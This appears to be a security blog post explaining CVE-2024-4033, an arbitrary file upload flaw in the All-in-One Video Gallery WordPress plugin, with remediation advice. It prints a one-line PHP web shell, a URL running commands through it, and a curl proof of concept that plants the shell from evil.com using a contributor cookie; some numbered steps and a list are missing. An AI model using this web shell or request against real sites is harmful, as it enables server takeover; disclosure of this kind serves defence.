CVE-2024-4033 - How All-in-One Video Gallery for WordPress Allows Arbitrary File Uploads (And Why You Should Patch Right Now)

If you use WordPress for managing your website videos, you may have heard about the All-in-One Video Gallery plugin. It's a popular tool, but a new security vulnerability—CVE-2024-4033—could put your entire site at risk.

This long-read post breaks down what this vulnerability is, why it's dangerous, how an attacker might exploit it, and what you can do to stay safe. We’ll include code snippets, easy-to-understand explanations, and links for further reading.

What is CVE-2024-4033?

CVE-2024-4033 is an arbitrary file upload vulnerability found in the All-in-One Video Gallery WordPress plugin, across all versions up to and including version 3.6.4.

Core Issue

The plugin’s aiovg_create_attachment_from_external_image_url function does not properly validate the type of files it downloads and attaches. As a result, someone with contributor access or higher could upload malicious files (like PHP scripts), instead of just images.

Why Is This Bad?

Uploading arbitrary files is one of the most dangerous vulnerabilities, because it can let attackers place web shells or backdoors on the server. Exploiting this flaw could allow an attacker to:

The Vulnerable Function

Here’s a simplified look at the aiovg_create_attachment_from_external_image_url function from the plugin code (based on available sources):

function aiovg_create_attachment_from_external_image_url($url) {
    // Download the file (no file type validation!)
    $tmp = download_url( $url );

    // Use WordPress wp_insert_attachment to add it to the media library
    $attachment = array(
        'post_mime_type' => $mime, // Derived from the file
        'post_title'     => $title,
        'post_content'   => '',
        'post_status'    => 'inherit'
    );

    $attach_id = wp_insert_attachment( $attachment, $tmp ); // No strict checks
    // ...
}

Key Problem

- The function uses whatever file is at the provided URL, without checking if it’s actually a safe image, or filtering by allowed file types.

Create or find a malicious file online (e.g., *evil.php* containing a simple PHP web shell).

3. Use the plugin function—by submitting a post, or uploading a video with an external image URL—to supply the URL to the malicious file.

The vulnerable function downloads and saves this file as a media item.

5. The attacker can then access the file (e.g., https://victim-site.com/wp-content/uploads/year/month/evil.php) and run code on the server.

evil.php

<?php system($_GET['cmd']); ?>

When asked for an image URL, the attacker enters

https://evil.com/evil.php

The All-in-One Video Gallery plugin downloads this .php file, stores it without checking the type, and makes it accessible on the website server.

Now the attacker can visit

https://victim-site.com/wp-content/uploads/2024/06/evil.php?cmd=whoami

…and execute OS commands, such as listing users or dumping files.

Proof-of-Concept (PoC) Snippet

Below is a basic curl request (requires authentication with contributor or higher privileges) to exploit the vulnerability by submitting a new post referencing a malicious file:

curl -X POST "https://victim.com/wp-admin/admin-ajax.php"; \
  -d "action=aiovg_import_video" \
  -d "video_url=https://example.com/video.mp4"; \
  -d "image=https://evil.com/evil.php" \
  -b "wordpress_logged_in_cookie_here"

Replace the cookies with valid WordPress contributor credentials.

All sites running All-in-One Video Gallery plugin version 3.6.4 or below

- Only logged-in users with at least contributor privileges (able to add posts/videos) can exploit the bug

Update the plugin

The All-in-One Video Gallery team has released patches. Upgrade to the latest version immediately!

Monitor uploads

Regularly check your wp-content/uploads/ directory for suspicious files (like .php, .phtml, etc).

References & Further Reading

- Original Advisory – Patchstack
- All-in-One Video Gallery – WordPress.org
- NVD Entry for CVE-2024-4033
- WordPress Plugin Security Best Practices

Conclusion

CVE-2024-4033 is a dangerous vulnerability that could easily let attackers take over WordPress sites using the All-in-One Video Gallery plugin. If you haven’t already, patch your plugin now and monitor your site closely. Arbitrary file upload bugs are among the most damaging—don't take chances!

Stay safe and keep your plugins updated!

If you found this post useful, consider sharing it. For more technical breakdowns, follow security news and keep your website locked down.

Timeline

Published on: 05/02/2024 17:15:33 UTC
Last modified on: 05/28/2024 21:06:54 UTC